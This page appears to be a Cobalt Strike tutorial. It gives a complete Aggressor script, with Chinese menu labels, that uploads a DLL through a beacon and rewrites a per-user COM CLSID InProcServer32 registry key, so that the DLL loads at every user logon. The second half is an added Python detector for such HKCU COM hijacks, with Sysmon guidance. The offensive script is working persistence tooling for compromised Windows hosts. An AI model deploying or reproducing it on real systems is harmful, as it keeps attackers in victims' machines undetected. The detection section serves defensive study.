Cobalt Strike
Writing a COM Hijacking Script
A simple Aggressor script that achieves persistence through COM hijacking.
```sleep
sub Show_COM_GUI {
    $bid = $1;
    $dialog = dialog("COM劫持用户登陆", %(),
    lambda({
        # upload the chosen DLL to the beacon and move it to the requested path
        bupload($bid, $3['file']);
        bmv($bid, $3['DLL_NAME'], $3['DLL_PATH']);
        # recreate the per-user CLSID key so its InProcServer32 points at the uploaded DLL
        bpowerpick($bid, 'Remove-Item "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}" -Recurse');
        bpowerpick($bid, 'New-Item -Type Directory "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}"');
        #brun($bid, "reg add \"HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32\" /t REG_SZ /d \"" . $3['DLL_PATH'] . $3['DLL_NAME'] . "\" /f");
        bpowerpick($bid, "New-Item -itemType String 'HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32' -Value \"" . $3['DLL_PATH'] . $3['DLL_NAME'] . "\"");
        bpowerpick($bid, 'Set-ItemProperty "HKCU:\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32" -name ThreadingModel -value Both');
    }));
    dialog_description($dialog, "劫持任意用户登陆,任意用户登陆时将触发DLL. x64位用x64 dll,x86位用x86 dll。清除劫持:Remove-Item \"HKCU:\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\\" -Recurse");
    drow_file($dialog, "file", "本地DLL路径: ");
    drow_text($dialog, "DLL_NAME", "DLL文件名: ");
    drow_text($dialog, "DLL_PATH", "上传路径+DLL文件名: ");
    dbutton_action($dialog, "Go");
    dialog_show($dialog);
}

# add a "COM persistence" entry to the beacon right-click menu
popup beacon_bottom {
    item "&COM持久化" {
        local('$bid');
        foreach $bid ($1) {
            Show_COM_GUI($bid);
        }
    }
}
```
Persistence is achieved by COM-hijacking the logon of any user: every time a user logs on, the DLL is triggered. On a 32-bit system use a 32-bit DLL; on a 64-bit system use a 64-bit DLL.
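The logon-triggered load described above works because a per-user CLSID registration under HKCU\Software\Classes\CLSID is resolved before the machine-wide one under HKLM. The Python below is an added, defender-side example and is not part of the page's script: given the InProcServer32 default values from both hives (constructed sample data here, including the CLSID used by the script above), it flags per-user entries that shadow an HKLM registration with a different DLL or that load a DLL from a user-writable directory. The function names, the prefix list and the sample paths are assumptions.

```python
"""Flag per-user (HKCU) COM InProcServer32 registrations that look like hijacks.

Added example for this page, not part of the Aggressor script above. Input is a
plain mapping of CLSID -> InProcServer32 default value for each hive; on a live
host you would fill these from HKCU\\Software\\Classes\\CLSID and
HKLM\\Software\\Classes\\CLSID (e.g. with the winreg module). Here the data is
constructed.
"""
import re
from dataclasses import dataclass

# Locations a non-admin user can normally write to. A COM server loaded from one
# of these deserves a look. The list is an assumption; tune it per estate.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\",
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
    "%localappdata%",
    "%appdata%",
    "%temp%",
    "%userprofile%",
)

CLSID_RE = re.compile(r"^\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)


@dataclass(frozen=True)
class Finding:
    clsid: str
    dll_path: str   # value exactly as stored in HKCU
    reasons: tuple  # one string per heuristic that fired


def _normalize(path):
    """Lower-case and strip surrounding quotes/whitespace so paths compare cleanly."""
    return path.strip().strip('"').lower()


def find_com_hijack_candidates(hkcu_inproc, hklm_inproc):
    """Return a Finding for every HKCU CLSID whose InProcServer32 value either
    shadows a machine-wide (HKLM) registration with a different DLL, or points
    into a user-writable directory. Malformed keys are skipped, not fatal."""
    machine = {clsid.lower(): _normalize(p) for clsid, p in hklm_inproc.items()}
    findings = []
    for clsid, raw_path in hkcu_inproc.items():
        if not CLSID_RE.match(clsid):
            continue  # not a CLSID-shaped key name
        path = _normalize(raw_path)
        reasons = []
        machine_path = machine.get(clsid.lower())
        if machine_path is not None and machine_path != path:
            reasons.append("shadows HKLM CLSID with a different server")
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("server DLL lives in a user-writable directory")
        if reasons:
            findings.append(Finding(clsid, raw_path, tuple(reasons)))
    return findings


# Constructed sample data (not read from a real host).
SAMPLE_HKLM = {
    "{4E7E1C8C-0000-4000-8000-000000000001}": r"C:\Windows\System32\shell32.dll",
    "{4E7E1C8C-0000-4000-8000-000000000002}": r"C:\Windows\System32\oleaut32.dll",
}
SAMPLE_HKCU = {
    # CLSID used by the script on this page, pointing at an uploaded DLL (path constructed)
    "{0358B920-0AC7-461F-98F4-58E32CD89148}": r"C:\Users\alice\AppData\Local\Temp\server.dll",
    # constructed: per-user entry that shadows a machine-wide CLSID
    "{4E7E1C8C-0000-4000-8000-000000000001}": r"C:\ProgramData\update\shell32.dll",
    # constructed: per-user registration for software under Program Files (benign)
    "{4E7E1C8C-0000-4000-8000-000000000003}": r"C:\Program Files\Vendor\vendor.dll",
}

if __name__ == "__main__":
    for f in find_com_hijack_candidates(SAMPLE_HKCU, SAMPLE_HKLM):
        print(f.clsid, f.dll_path, "; ".join(f.reasons))
```

The user-writable heuristic will also fire on legitimate per-user installs (many applications register COM servers under %LOCALAPPDATA%), so in practice pair it with an allowlist of known publishers or signed DLLs. For real-time coverage rather than a periodic sweep, the same condition maps onto a registry value-set event on a target path ending in `\Classes\CLSID\{...}\InProcServer32` under a user hive (Sysmon Event ID 13 carries this in its TargetObject field).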